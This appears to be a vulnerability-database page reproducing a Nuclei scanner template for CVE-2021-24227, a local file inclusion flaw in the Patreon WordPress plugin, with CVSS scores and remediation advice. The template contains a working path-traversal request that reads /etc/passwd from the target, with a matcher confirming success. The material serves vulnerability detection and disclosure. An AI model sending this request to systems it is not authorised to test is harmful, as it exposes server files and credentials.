Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24227
HistoryOct 05, 2022 - 7:53 a.m.

Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion

2022-10-0507:53:13
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.022 Low

EPSS

Percentile

89.6%

Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.

id: CVE-2021-24227

info:
  name: Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion
  author: theamanrawat
  severity: high
  description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system.
  remediation: |
    Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
    - https://wordpress.org/plugins/patreon-connect/
    - https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24227
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24227
    cwe-id: CWE-200
    epss-score: 0.02607
    epss-percentile: 0.90292
    cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: patreon
    product: patreon_wordpress
    framework: wordpress
  tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d715a8e520cf5727c132342f09ac7b40097daca062029a9cb8f6b7bf2bd6c5ba0220142bb7c95232cdbb5e7fc81003752a1bd8d72ab9bb20e42fa86153d12f216f67:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.022 Low

EPSS

Percentile

89.6%

Related for NUCLEI:CVE-2021-24227